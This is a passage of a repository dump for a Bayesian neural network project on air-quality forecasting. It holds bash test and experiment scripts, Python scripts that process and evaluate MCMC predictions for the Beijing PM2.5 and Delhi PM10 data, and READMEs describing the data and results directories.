"text": "#!/bin/bash\n\n# THESE SIMPLE TESTS ENSURE THAT THE ANALYSIS OF RESULTS SCRIPTS FUNCTION AS EXPECTED\n\n\npython analyse_test_results.py \"tests/Test_01/\" \"tests/Test_01/test_predictions.tsv\" \"tests/Test_01/test_data.csv\" 2 target_value current_value\n\npython analyse_test_results.py \"tests/Test_05/\" \"tests/Test_05/test_predictions.tsv\" \"tests/Test_05/test_data.csv\" 2 target_value current_value\n\npython analyse_test_results.py \"tests/Test_06/\" \"tests/Test_06/test_predictions.tsv\" \"tests/Test_06/test_data.csv\" 2 target_value current_value\n\npython analyse_test_results.py \"tests/Test_07/\" \"tests/Test_07/test_predictions.tsv\" \"tests/Test_07/test_data.csv\" 2 target_value current_value\n\nFAILED=\"False\"\n\nDIFF=\"$(diff \"./tests/Test_01/testdata_performance.csv\" \"./tests/Test_01/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ] \nthen\n echo \"TEST 1 FAILED\"\n FAILED='True'\nfi\n\n\nDIFF=\"$(diff \"./tests/Test_05/testdata_performance.csv\" \"./tests/Test_05/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 5 FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/Test_06/testdata_performance.csv\" \"./tests/Test_06/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 6 FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/Test_07/testdata_performance.csv\" \"./tests/Test_07/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 7 FAILED\"\n FAILED='True'\nfi\n\n\nif [ \"$FAILED\" == \"False\" ]\nthen\n echo \"ALL ANALYSE TESTS PASSED\"\nfi\n \n\n"
},
{
"alpha_fraction": 0.4979363679885864,
"alphanum_fraction": 0.530422031879425,
"avg_line_length": 42.410404205322266,
"blob_id": "24c83c69db89acb685fde536a7965509669e6597",
"content_id": "f44b85a71d274620fcc710a875623903372082a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7511,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 173,
"path": "/analyse_test_results.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport time\nimport sys\nimport os\nimport yaml\n\nsys.path.append('../Dataset_Transformers')\nfrom transform import Normalizer as nzr\n\n\n#################################################################################\n#\n# ANALYSE THE RESULTS OF TEST PREDICTIONS FOR A BAYESIAN MODEL \n#\n# WE WANT TO CREATE THE MEAN AND QUANTILE PREDICTIONS FROM THE RAW MODEL OUTPUTS\n# AND THEN SUMMARISE THIS TO INDCATE HOW WELL CALIBRATED THE MODEL IS AND HOW\n# WELL THE MEAN PERFORMS AS AN ESTIMATOR.\n#\n# PARAMETERS\n# - PATH TO RESULTS: DIRECTORY IN WHICH TO WRITE RESULTS\n# - PATH TO TEST RESULT: THE PREDICTIONS MADE ON THE TEST DATA\n# - PATH TO TESTING DATA: PATH TO THE ORIGINAL UN-NORMALISED TEST DATA\n# - BURNIN: INTEGER\n# - TARGET_COL_NAME: COLUMN NAME OF FOR PREDICTION TARGET\n# - NAIVE_COL_NAME: CALCULATING MASE\n#\n#################################################################################\n\ndef main():\n if len(sys.argv) < 6:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n result_path = sys.argv[1]\n result_file_path = sys.argv[2]\n test_data_path = sys.argv[3]\n burnin = sys.argv[4]\n target_col = sys.argv[5]\n ref_col = sys.argv[6]\n \n test_data = pd.read_csv(test_data_path, sep=\",\")\n test_preds = np.loadtxt(result_file_path)\n print( test_preds.shape )\n\n data_with_preds = add_mean_and_quantiles( test_data, test_preds, burnin )\n\n # NOW WE ARE READY TO PRODUCE SUMMARY AND PLOTS\n write_prediction_intervals_file( data_with_preds, target_col, result_path )\n summarise_model_calibration( data_with_preds, target_col, result_path )\n summarise_model_performance( data_with_preds, target_col, result_path, ref_col )\n\n\n#################################################################################\n# USAGE\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<RESULTS DIR> <RESULTS FILE> <TEST DATA PATH> <BURNIN> <TARGET COL> <NAIVE COL>\")\n\n\n\n#################################################################################\n# ADDING PREDICTINGS AND QUANTILE BANDS \n#################################################################################\ndef add_mean_and_quantiles( test_data, test_preds, burnin ) :\n rez = test_data.copy()\n tested = test_preds[int(burnin):, ]\n rez['mu'] = tested.mean(axis=0)\n rez['qnt_99'] = np.percentile(tested, 99, axis=0)\n rez['qnt_95'] = np.percentile(tested, 95, axis=0)\n rez['qnt_90'] = np.percentile(tested, 90, axis=0)\n rez['qnt_80'] = np.percentile(tested, 80, axis=0)\n rez['qnt_20'] = np.percentile(tested, 20, axis=0)\n rez['qnt_10'] = np.percentile(tested, 10, axis=0)\n rez['qnt_5'] = np.percentile(tested, 5, axis=0)\n rez['qnt_1'] = np.percentile(tested, 1, axis=0) \n return rez\n\n\n#################################################################################\n# WRITE OUT THE TRUE VALUES AND PREDICTION INTERVALS FILE\n#################################################################################\ndef write_prediction_intervals_file( test_data, target_field_name, results_path ) :\n\n data = {'y':test_data[target_field_name], \n 'qnt_1':test_data['qnt_1'], \n 'qnt_5':test_data['qnt_5'], \n 'qnt_10':test_data['qnt_10'], \n 'qnt_20':test_data['qnt_20'], \n 'mu': test_data['mu'], \n 'qnt_80':test_data['qnt_80'], \n 'qnt_90':test_data['qnt_90'], \n 'qnt_95':test_data['qnt_95'], \n 
'qnt_99':test_data['qnt_99'] }\n df = pd.DataFrame(data)\n df.to_csv(results_path + '/testdata_prediction_intervals.csv', index=False)\n\n\n#################################################################################\n# CALCULATE SUMMARY STATISTICS ABOUT THE CALIBRATION OF THE MODEL\n#################################################################################\ndef summarise_model_calibration( test_data, target_name, results_path ):\n df = test_data.copy() \n df[\"in_98_window\"] = np.where( (df[target_name]>df['qnt_1']) & (df[target_name]<df['qnt_99']), 1, 0 )\n df[\"in_90_window\"] = np.where( (df[target_name]>df['qnt_5']) & (df[target_name]<df['qnt_95']), 1, 0 )\n df[\"in_80_window\"] = np.where( (df[target_name]>df['qnt_10']) & (df[target_name]<df['qnt_90']), 1, 0 )\n df[\"in_60_window\"] = np.where( (df[target_name]>df['qnt_20']) & (df[target_name]<df['qnt_80']), 1, 0 )\n df[\"window_size_98\"] = df['qnt_99'] - df['qnt_1']\n df[\"window_size_90\"] = df['qnt_95'] - df['qnt_5']\n df[\"window_size_80\"] = df['qnt_90'] - df['qnt_10']\n df[\"window_size_60\"] = df['qnt_80'] - df['qnt_20']\n\n in_98_window = df[\"in_98_window\"].mean()\n in_90_window = df[\"in_90_window\"].mean()\n in_80_window = df[\"in_80_window\"].mean()\n in_60_window = df[\"in_60_window\"].mean()\n max_window_size_98 = df[\"window_size_98\"].max()\n mean_window_size_98 = df[\"window_size_98\"].mean()\n min_window_size_98 = df[\"window_size_98\"].min()\n\n max_window_size_90 = df[\"window_size_90\"].max()\n mean_window_size_90 = df[\"window_size_90\"].mean()\n min_window_size_90 = df[\"window_size_90\"].min()\n max_window_size_80 = df[\"window_size_80\"].max()\n mean_window_size_80 = df[\"window_size_80\"].mean()\n min_window_size_80 = df[\"window_size_80\"].min()\n\n max_window_size_60 = df[\"window_size_60\"].max()\n mean_window_size_60 = df[\"window_size_60\"].mean()\n min_window_size_60 = df[\"window_size_60\"].min()\n\n sum_data = { 'window': [98,90,80,60],\n 'calibration':[in_98_window,in_90_window,in_80_window,in_60_window],\n 'min_size':[min_window_size_98,min_window_size_90,min_window_size_80,min_window_size_60],\n 'mean_size':[mean_window_size_98,mean_window_size_90,mean_window_size_80,mean_window_size_60],\n 'max_size':[max_window_size_98,max_window_size_90,max_window_size_80,max_window_size_60] }\n sum_df = pd.DataFrame(sum_data)\n sum_df.to_csv(results_path + '/testdata_calibration.csv', index=False)\n\n\n#################################################################################\n# CALCULATE PERFORMANCE STATISTICS OF THE MODEL\n#################################################################################\ndef summarise_model_performance( test_data, target_name, results_path, naive_col='' ):\n df = test_data.copy()\n df[\"base_error\"] = df['mu'] - df[target_name]\n df[\"nominal_target\"] = np.where(df[target_name]==0, 0.000001, df[target_name])\n df[\"abs_percent_error\"] = abs(100*df[\"base_error\"]/df[\"nominal_target\"])\n df[\"abs_error\"] = abs(df[\"base_error\"])\n df[\"naive_error\"] = df[naive_col] - df[target_name]\n df[\"abs_naive_error\"] = abs( df[\"naive_error\"] )\n df[\"abs_percent_error_naive\"] = abs(100*df[\"naive_error\"]/df[\"nominal_target\"])\n sum_data = {\n 'MAE': [ df[\"abs_error\"].mean() ],\n 'MAPE': [ df[\"abs_percent_error\"].mean() ],\n 'MASE': [ df[\"abs_error\"].sum() / df[\"abs_naive_error\"].sum() ],\n 'MAE Naive': [ df[\"abs_naive_error\"].mean() ],\n 'MAPE Naive': [ df[\"abs_percent_error_naive\"].mean() ]\n }\n sum_df = pd.DataFrame(sum_data)\n 
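    # NOTE (editor): the MASE computed above is the ratio of summed absolute errors,
    # sum(|mu - y|) / sum(|naive - y|), which equals MAE / MAE-Naive over the same
    # test rows; values below 1.0 mean the model beats the naive forecast.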
sum_df.to_csv(results_path + '/testdata_performance.csv', index=False)\n\n\n\n\n\nif __name__ == \"__main__\": main()\n\n"
},
{
"alpha_fraction": 0.595198392868042,
"alphanum_fraction": 0.6145381927490234,
"avg_line_length": 40.05479431152344,
"blob_id": "72432690f929573691a854760bf2e66eafd9ac32",
"content_id": "37c722c68c1b7b49f4275558b5801e684a352e7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2999,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 73,
"path": "/data/Delhi/generate_train_test_sets.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport sys\nimport os\n\nsys.path.append('../../../Dataset_Transformers')\n\nfrom transform import DatasetGenerator as dg\nfrom transform import Normalizer as nzr\n\ndf = pd.read_csv('delhi_pm10_all_stations_wide.csv')\n\nindex_column = \"No\"\nforecast_period = 7\nlist_of_lags = [7,14,21]\n\ncut_off_date = '2015-01-01'\n\n# NEED TO ADD THE INDEX COLUMN\ndf[index_column] = range( 0, len(df) )\n\n# FUNCTIONS\n#################################################################################\ndef ensure_dir(results_dir):\n directory = os.path.abspath(results_dir)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef generate_files_for_station(stat, index_column, cut_off_date, forecast_period, list_of_lags):\n folder = 'STN_%s' % str(stat)\n ensure_dir(folder)\n forecast_column = 'STN_%s_PM10' % str(stat)\n new_df = dg.generate_time_dependent_features( df, index_column, forecast_column, forecast_period, list_of_lags)\n train_df = new_df[ new_df['Date']<cut_off_date ]\n test_df = new_df[ new_df['Date']>=cut_off_date ]\n # ###########################################################################################################\n # REMOVE UNWANTED COLUMNS, NORMALISE AND WRITE TO DISK\n # -- WE REMOVE THE DIFF VERSION OF THE TARGET \n # AS IN THIS PROBLEM DATA IS GENERALLY STATIONARY (IT DOES NOT EXHIBIT OVERALL TREND)\n # ###########################################################################################################\n features = train_df.columns.tolist()\n\n val_name = 'STN_%s_PM10' % str(stat)\n targ1_name = 'TARGET_STN_%s_PM10_7_VALUE' % str(stat)\n targ2_name = 'TARGET_STN_%s_PM10_7_DIFF' % str(stat)\n targ3_name = 'TARGET_STN_%s_PM10_7_PROP_DIFF' % str(stat)\n unwanted = ['No', 'Date', val_name, targ1_name, targ2_name, targ3_name]\n\n for x in unwanted : \n features.remove(x)\n features.append(val_name)\n features.append(targ1_name)\n # WRITE OUT THE UN-NORMALISED VERSION\n train_df2 = train_df.loc[:, features]\n test_df2 = test_df.loc[:, features] \n train_df2.to_csv(folder+'/train.csv', encoding='utf-8', index=False, header=True)\n test_df2.to_csv(folder+'/test.csv', encoding='utf-8', index=False, header=True)\n\n config = nzr.create_normalization_config(train_df2)\n nzr.write_field_config(config, targ1_name, folder+'/nzr_config.yaml')\n\n train_df_norm = nzr.normalize(train_df2, config, [])\n test_df_norm = nzr.normalize(test_df2, config, [])\n\n train_df_norm.to_csv(folder+'/train_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\n test_df_norm.to_csv(folder+'/test_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n\ngenerate_files_for_station(144, index_column, cut_off_date, forecast_period, list_of_lags)\ngenerate_files_for_station(146, index_column, cut_off_date, forecast_period, list_of_lags)\ngenerate_files_for_station(345, index_column, cut_off_date, forecast_period, list_of_lags)\n\n\n"
},
{
"alpha_fraction": 0.7485714554786682,
"alphanum_fraction": 0.7485714554786682,
"avg_line_length": 28,
"blob_id": "1677b58b59285fa39def296f55b22eccccb80624",
"content_id": "07365b5ea027081a62edf1ca97e1f60b1c91e868",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 6,
"path": "/analysis/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Analysis\n--------\n\nThis directory contains the scripts used to generate summary tables of the datasets.\n\nExecute [RUN.sh](RUN.sh) to regenerate the tables used in the paper.\n\n"
},
{
"alpha_fraction": 0.7407407164573669,
"alphanum_fraction": 0.7407407164573669,
"avg_line_length": 25.5,
"blob_id": "e570e29b939f7e91d1684a70c843d9264e458eba",
"content_id": "6108262b3004478d5c00b507564e8f860ba91713",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 4,
"path": "/results/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "Results\n=======\n\nDummy directory so that when you run an example there is a default directory for results\n\n\n"
},
{
"alpha_fraction": 0.6829268336296082,
"alphanum_fraction": 0.6829268336296082,
"avg_line_length": 15,
"blob_id": "aa24f3bcdab727484d45a4fc071a4d3c52834152",
"content_id": "7b04147dc59525e68375d79cc6a78382de2690fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 5,
"path": "/experiments/RUN_Delhi.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n./RUN_Delhi_FFNN.sh\n./RUN_Delhi_LangevinFFNN.sh\n./RUN_Delhi_SLP.sh\n\n\n"
},
{
"alpha_fraction": 0.7301061153411865,
"alphanum_fraction": 0.7539787888526917,
"avg_line_length": 38.644737243652344,
"blob_id": "b1d665d43b3afccabee9deeda5a3f905bf263583",
"content_id": "85e5cec369945662c746d57e8ed5ea9d618fa792",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3024,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 76,
"path": "/data/Beijing/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "BeiJing PM2.5 Particulate Concentration Data\n============================================\n \nThis data contains hourly observations of pm2.5 particulate matter concentrations from the US embassy in BeiJing.\nThese are combined with various measurements of the weather conditions at the same points in time.\n\nDownloaded from [https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data](https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data)\n\n\n### Source:\n\nSong Xi Chen, csx '@' gsm.pku.edu.cn, Guanghua School of Management, Center for Statistical Science, Peking University.\n\n\n### Data Set Information:\n\nThe data time period is between Jan 1st, 2010 to Dec 31st, 2014. Missing data are denoted as NA\n\nThere are a total of 43,824 records.\n\n### Attribute Information:\n\nNo: row number \nyear: year of data in this row \nmonth: month of data in this row \nday: day of data in this row \nhour: hour of data in this row \npm2.5: PM2.5 concentration (ug/m^3) \nDEWP: Dew Point (℃) \nTEMP: Temperature (℃) \nPRES: Pressure (hPa) \ncbwd: Combined wind direction \nIws: Cumulated wind speed (m/s) \nIs: Cumulated hours of snow \nIr: Cumulated hours of rain \n\n\nRelevant Papers:\n\nLiang, X., Zou, T., Guo, B., Li, S., Zhang, H., Zhang, S., Huang, H. and Chen, S. X. (2015). Assessing Beijing's PM2.5 pollution: severity, weather impact, APEC and winter heating. Proceedings of the Royal Society A, 471, 20150257.\n\n\n\n### Processing\n\nThe file [RUN.sh](RUN.sh) will both download the data and then process it into the format reading for training.\n\nThere are a series of process files that generate each of the different forecast window datasets. These are\n\n* [process_1_hour.py](process_1_hour.py)\n* [process_24_hour.py](process_24_hour.py)\n* [process_168_hour.py](process_168_hour.py)\n\nThese files process the raw data into a predictive format suitable for treating the problem as a regression task\nin which we attempt to predict the value of pm2.5 particulate matter either 1, 24 or 168 hours in advance.\n\nIn addition we convert the field 'cbwd' into 4 indicator variables, one for each of the wind direction componenets (N,S,E,W)\n\nWe remove any rows for which the target is NULL, and we use mean value imputation for missing values in the features.\n\nWe split out the first 30,000 of the remaining rows for training and test on the remaining data.\n\nWe normalise all feature columns by subtracting the minimun value and then dividing by the different between the \nmaximum and the minimum. Rather that subtracting the mean and dividing by the standard deviation of the training data\n(mean and std of training is applied to normalise the test data)\n\n\n### Dependencies\n\nThe processing of the data into time based features requires the Dataset_Generator library.\nYou can pull the repo from here. \n\n[https://github.com/john-hawkins/Dataset_Transformers](https://github.com/john-hawkins/Dataset_Transformers)\n\nNote that the file process files import from this library assuming that it\nis another directory found in the same root directory as this project.\n\n\n\n"
},
{
"alpha_fraction": 0.7027677297592163,
"alphanum_fraction": 0.7653429508209229,
"avg_line_length": 74.45454406738281,
"blob_id": "8a9b02e5bba8565e48f2835c702abed1a29807d6",
"content_id": "3f53f0238f51765bc90cf93940594b3c7bf4caae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 831,
"license_type": "no_license",
"max_line_length": 304,
"num_lines": 11,
"path": "/experiments/RUN_BeiJing_24hr_FFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 53 20 1 0 FFNN sigmoid data/Beijing/sets/Train_24_hour_norm.csv data/Beijing/sets/Test_24_hour_norm.csv results/Beijing_FFNN_24Hr_Sigmoid/ MASE 100000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n\npython3 ./transform_test_results.py \"./results/Beijing_FFNN_24Hr_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_FFNN_24Hr_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" \"data/Beijing/sets/Target_24_nzr_config.yaml\" True False False False \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\npython3 analyse_test_results.py \"./results/Beijing_FFNN_24Hr_Sigmoid\" \"./results/Beijing_FFNN_24Hr_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" 50000 \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.48261475563049316,
"alphanum_fraction": 0.4860917925834656,
"avg_line_length": 35.24369812011719,
"blob_id": "93734c6a6bf9eaa22a44a7fd15cb23270752b632",
"content_id": "a8bf26f49aa5c18a901011835c03e6054ffb9330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4314,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 119,
"path": "/transform_test_results.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport time\nimport sys\nimport os\n\nsys.path.append('../Dataset_Transformers')\nfrom transform import Normalizer as nzr\n\n\n#################################################################################\n#\n# TRANSFORM THE RESULTS OF TEST PREDICTIONS FOR A BAYESIAN MODEL \n#\n# PARAMETERS\n# - PATH TO WRITE RESULTING TRANSFORMED FILE\n# - PATH TO TEST RESULT: THE PREDICTIONS MADE ON THE TEST DATA\n# - PATH TO TESTING DATA: PATH TO THE ORIGINAL UN-NORMALISED DATA\n# - PATH TO DE-NORMALISATION FILE: FILE CONTAINING PARAMTERS TO DE-NORMALISE TARGET PREDS\n# - IS_NORMALISED: BOOLEAN\n# - IS_DIFFERENCED: BOOLEAN\n# - IS_PROPORTIONAL: BOOLEAN\n# - ROUND: BOOLEAN\n# - TARGET_COL_NAME: COLUMN NAME OF FOR PREDICTION TARGET\n# - NAIVE_COL_NAME: FOR USE IF DIFFERENCING HAS BEEN APPLIED AND CALCULATING MASE\n#\n#################################################################################\ndef main():\n if len(sys.argv) < 10:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n result_path = sys.argv[1]\n result_file_path = sys.argv[2]\n test_data_path = sys.argv[3]\n norm_path = sys.argv[4]\n is_normalised = sys.argv[5]\n is_differenced = sys.argv[6]\n is_proportional = sys.argv[7]\n apply_round = sys.argv[8]\n target_col = sys.argv[9]\n ref_col = sys.argv[10]\n \n test_data = pd.read_csv( test_data_path, sep=\",\" )\n test_preds = np.loadtxt( result_file_path )\n nzr_config = nzr.read_normalization_config( norm_path )\n\n final_preds = test_preds\n\n if is_normalised=='True':\n final_preds = nzr.de_normalize_all( test_preds, nzr_config )\n \n if is_differenced=='True':\n final_preds = de_difference( test_data, final_preds, ref_col, target_col )\n\n if is_proportional=='True':\n final_preds = de_prop_difference( test_data, final_preds, ref_col, target_col, apply_round )\n\n write_results(final_preds, result_path)\n\n\n#################################################################################\n# USAGE\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<RESULTS DIR> <TEST PREDS FILE> <TEST DATA PATH> <DE NORM FILE>\",\n \" <IS NORMALISED> <IS DIFFERENCED> <IS PROPORTIONAL> <ROUND>\",\n \" <TARGET COL> <NAIVE COL>\"\n )\n\n\n#################################################################################\n# OPEN THE NORMALISATION CONFIG FILE\n#################################################################################\ndef load_normalisation_data(nzr_path):\n with open(nzr_path, 'r') as stream:\n lded = yaml.load(stream)\n return lded\n\n\n#################################################################################\n# DE-DIFFERENCE THE RAW PREDICTIONS\n#################################################################################\ndef de_difference( data, preds, ref_col, target_col ):\n print(\"De-Differencing from \", target_col, \" using \", ref_col)\n rez = preds.copy()\n print( \"rez\", len(rez))\n print( \"data\", len(data))\n for i in range(len(data)):\n rez[:,i] = data.iloc[i,:][ref_col] + rez[:,i]\n return rez\n\n\n#################################################################################\n# DE-PROPORTIONAL DIFFERENCE THE RAW PREDICTIONS\n#################################################################################\ndef de_prop_difference( data, preds, ref_col, target_col, apply_rounding ):\n rez = preds.copy()\n for i 
in range( len(data) ):\n rez[:,i] = data.iloc[i,:][ref_col] + ( rez[:,i] * data.iloc[i,:][ref_col] )\n if apply_rounding=='True':\n rez[:,i] = np.around( rez[:,i] )\n return rez\n\n\n#################################################################################\n# WRITE OUT THE TRUE VALUES AND PREDICTION INTERVALS FILE\n#################################################################################\ndef write_results( dataset, results_path ) :\n df = pd.DataFrame(dataset)\n df.to_csv(results_path, sep=\" \", index=False, header=False)\n\n\nif __name__ == \"__main__\": main()\n\n"
},
{
"alpha_fraction": 0.6191950440406799,
"alphanum_fraction": 0.6738905906677246,
"avg_line_length": 68.07142639160156,
"blob_id": "436eabb47dc4e878ae7ff5a0eb9e10ca73763246",
"content_id": "102268c444d086bf1fd66aa953b8355c94f97c99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 969,
"license_type": "no_license",
"max_line_length": 306,
"num_lines": 14,
"path": "/experiments/RUN_BeiJing_7day_SLP.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\n# BeiJing Air Quality \n \npython3 ./train_bn_mcmc.py 28 0 1 0 SLP sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_7day_SLP_Sigmoid/ MASE 100000\n\n##############################################################################################################\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_7day_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_7day_SLP_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_7day_SLP_Sigmoid\" \"./results/Beijing_7day_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 50000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n\n"
},
{
"alpha_fraction": 0.7062857151031494,
"alphanum_fraction": 0.7725714445114136,
"avg_line_length": 86.4000015258789,
"blob_id": "9668d6e380cd89cd79cd1509ae9d9740fb11b5ff",
"content_id": "ed937ef65e4b98d9f9a15cf3753db51965d9472c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 875,
"license_type": "no_license",
"max_line_length": 321,
"num_lines": 10,
"path": "/experiments/RUN_BeiJing_7day_DeepFFNN_H5.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 28 5 1 3 DeepFFNN sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_DeepFFNN_H5_7day_Sigmoid/ MASE 100000\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n\npython3 ./transform_test_results.py \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\npython3 analyse_test_results.py \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid\" \"./results/Beijing_DeepFFNN_H5_7day_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 50000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.42060890793800354,
"alphanum_fraction": 0.4285714328289032,
"avg_line_length": 31.815383911132812,
"blob_id": "11434b9552a14bf1a0982cb1dd6428fbda3ce1b3",
"content_id": "b6ad41cb2fea1d7c6c13dba60b4dab45fce6dcc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2135,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 65,
"path": "/analysis/summarise_data.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport sys\n\n#################################################################################\ndef main():\n if len(sys.argv) < 1:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n dataset = sys.argv[1]\n\n df = pd.read_csv(dataset)\n generate_analysis(df)\n\n#################################################################################\n# USAGE\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<RESULTS DIR> <TEST PREDS FILE> <TEST DATA PATH> <DE NORM FILE>\",\n \" <IS NORMALISED> <IS DIFFERENCED> <IS PROPORTIONAL> <ROUND>\",\n \" <TARGET COL> <NAIVE COL>\"\n )\n\ndef generate_analysis(df):\n colnames = df.columns\n \n records = len(df)\n \n print(\"\\\\begin{table}[h!]\")\n print(\" \\\\begin{center}\")\n print(\" \\\\caption{Data Summary}\")\n print(\" \\\\label{tab:table1}\")\n print(\" \\\\begin{tabular}{l|l|r|r|r|r} \")\n print(\" \\\\textbf{Col Name} & \\\\textbf{Type} & \\\\textbf{Missing \\%} & \\\\textbf{Min} & \\\\textbf{Mean} & \\\\textbf{Max}\\\\\\\\\")\n print(\" \\\\hline\")\n \n for name in colnames:\n nacount = len(df[df[name].isna()])\n napercent = round(100*nacount/records,3)\n valtype = \"Char\"\n thetype = str(type(df.loc[1,name]))\n if thetype == \"<class 'numpy.float64'>\" :\n valtype = \"Real\"\n if thetype == \"<class 'numpy.int64'>\" :\n valtype = \"Int\"\n if (valtype != \"Char\") :\n themin = round(df[name].min(),3)\n themean = round(df[name].mean(),3)\n themax = round(df[name].max(),3)\n else:\n themin = \"-\"\n themean = \"-\"\n themax = \"-\"\n print(\" \", name, \"&\", valtype, \"&\", napercent, \"&\", themin, \"&\", themean, \"&\", themax, \"\\\\\\\\\")\n \n print(\" \\\\end{tabular}\")\n print(\" \\\\end{center}\")\n print(\"\\\\end{table}\")\n \n############################################### \n\nif __name__ == \"__main__\": main()\n\n\n"
},
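The script above detects column types by comparing `str(type(df.loc[1, name]))` against numpy class names, which breaks if row index 1 is absent or holds a NaN. A minimal alternative sketch using pandas' dtype helpers; the helper name `summarise_column` is my own, not from the repo:

```python
import numpy as np
import pandas as pd
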